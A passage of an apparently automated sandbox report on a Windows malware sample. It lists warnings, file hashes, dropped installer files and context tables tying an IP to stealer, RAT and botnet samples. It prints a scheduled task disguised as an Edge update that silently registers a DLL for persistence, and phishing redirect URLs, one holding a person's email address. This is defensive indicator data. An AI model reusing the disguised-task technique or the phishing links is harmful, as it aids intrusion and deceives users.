                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 89%
                                              • Number of executed functions: 48
                                              • Number of non-executed functions: 49
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 7736 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 8100 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              01:58:25Task SchedulerRun new task: MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88} path: regsvr32 s>/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
                                              20:58:13API Interceptor73x Sleep call for process: powershell.exe modified
                                              20:58:52API Interceptor466838x Sleep call for process: regsvr32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              93.93.131.124a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                              • the.earth.li/~sgtatham/putty/0.63/x86/putty.exe
                                              doc.docGet hashmaliciousUnknownBrowse
                                              • the.earth.li/~sgtatham/putty/latest/w64/putty.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              the.earth.lisetup.exeGet hashmaliciousAmadeyBrowse
                                              • 93.93.131.124
                                              Wzphku.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Wzphku.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              epah.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              client_1.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              client_3.vbsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Informazion.vbsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              827837hj.xlsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              doc.docGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              MYTHICMythicBeastsLtdGBsetup.exeGet hashmaliciousAmadeyBrowse
                                              • 93.93.131.124
                                              Wzphku.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Wzphku.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              epah.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              client_1.htaGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              client_3.vbsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Informazion.vbsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              827837hj.xlsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              7XlWWSA2LU.dllGet hashmaliciousWannacryBrowse
                                              • 93.93.132.33
                                              SKHT-ASShenzhenKatherineHengTechnologyInformationCo1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                              • 154.216.19.141
                                              dvwkja7.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109
                                              http://www.dvdcollections.co.uk/search/redirect.php?deeplink=https://lp-engenharia.com/zerooo/?email=mwright@burbankca.govGet hashmaliciousHTMLPhisherBrowse
                                              • 154.216.17.193
                                              https://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20thoughGet hashmaliciousUnknownBrowse
                                              • 154.216.17.193
                                              new.batGet hashmaliciousUnknownBrowse
                                              • 154.216.17.175
                                              dvwkja7.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109
                                              wnbw86.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109
                                              vqsjh4.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109
                                              jwwofba5.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109
                                              qkehusl.elfGet hashmaliciousMiraiBrowse
                                              • 154.216.16.109

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              https://www.cbirc.gov.cn/cn/view/pages/index/index.htmlGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              BOA-everbridge.com-$29,890.htmlGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              PNSBt.jsGet hashmaliciousAsyncRATBrowse
                                              • 93.93.131.124
                                              LETA_pdf.vbsGet hashmaliciousAsyncRAT, PureLog StealerBrowse
                                              • 93.93.131.124
                                              plutonium.exeGet hashmaliciousUnknownBrowse
                                              • 93.93.131.124
                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                              • 93.93.131.124
                                              ahmbf.ps1Get hashmaliciousUnknownBrowse
                                              • 93.93.131.124

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmpfile.exeGet hashmaliciousNymaim, Socks5SystemzBrowse
                                                hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                  hkQx7f6zzw.exeGet hashmaliciousTVratBrowse
                                                    aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                      aeyh21MAtA.exeGet hashmaliciousTVratBrowse
                                                        aesM8nmCM2.exeGet hashmaliciousUnknownBrowse
                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                            OFjT8HmzFJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                              BJqvg1iEdr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                iv2Mm5SEJF.exeGet hashmaliciousSocks5SystemzBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:modified
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.34726597513537405
                                                                  Encrypted:false
                                                                  SSDEEP:3:Nlll:Nll
                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_43pokpvo.rhh.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pu10rbo.ls4.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5argqkq3.mgv.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ebjbczv2.kxr.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_glle3ccc.2an.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ie5y5ywf.sva.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik3iq54c.hdw.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kugqo02g.a11.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oy1zruom.afo.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qio3crjx.dij.ps1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rbwf1hjk.ghv.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wqgfilsy.3lw.psm1

                                                                  Download File
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                  C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_setup64.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6144
                                                                  Entropy (8bit):4.215994423157539
                                                                  Encrypted:false
                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                  MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                  SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                  SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                  SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Joe Sandbox View:
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: hkQx7f6zzw.exe, Detection: malicious, Browse
                                                                  • Filename: hkQx7f6zzw.exe, Detection: malicious, Browse
                                                                  • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                  • Filename: aeyh21MAtA.exe, Detection: malicious, Browse
                                                                  • Filename: aesM8nmCM2.exe, Detection: malicious, Browse
                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                  • Filename: OFjT8HmzFJ.exe, Detection: malicious, Browse
                                                                  • Filename: BJqvg1iEdr.exe, Detection: malicious, Browse
                                                                  • Filename: iv2Mm5SEJF.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\is-5SLSV.tmp\_isetup\_shfoldr.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23312
                                                                  Entropy (8bit):4.596242908851566
                                                                  Encrypted:false
                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_setup64.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):6144
                                                                  Entropy (8bit):4.215994423157539
                                                                  Encrypted:false
                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                  MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                  SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                  SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                  SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  • Antivirus: Virustotal, Detection: 0%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\is-B0R75.tmp\_isetup\_shfoldr.dll

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23312
                                                                  Entropy (8bit):4.596242908851566
                                                                  Encrypted:false
                                                                  SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                  MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                  SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                  SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                  SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1160704
                                                                  Entropy (8bit):6.3941502469827425
                                                                  Encrypted:false
                                                                  SSDEEP:24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
                                                                  MD5:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  SHA1:0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
                                                                  SHA-256:90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
                                                                  SHA-512:E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 2%
                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O..........................................@..............................................@...............................7......<...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...<............"..............@..@....................................@..@........................................................................................................................................

                                                                  C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\file.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1160704
                                                                  Entropy (8bit):6.3941502469827425
                                                                  Encrypted:false
                                                                  SSDEEP:24576:MYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5MNx9XU:3GUhni7iSFCQGu
                                                                  MD5:14C6FA8E50B4147075EB922BD0C8B28D
                                                                  SHA1:0FAAD18B0E26CE3B5C364621A4F0AEE9DB56A9A7
                                                                  SHA-256:90C4A61AF494B63ECFE1226714175675A4E49E57D50718491B3BC8FE29DD8FC7
                                                                  SHA-512:E6C35BBCAA9A8BB306E58BB91AADF5FEED6B1AD1DF6EE0E68BF3BAE9B76D84C862B4EE9DD87A1D288FE1B7AAAAC13467964436A09EC529F67AF50905CD0EF876
                                                                  Malicious:false
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 2%
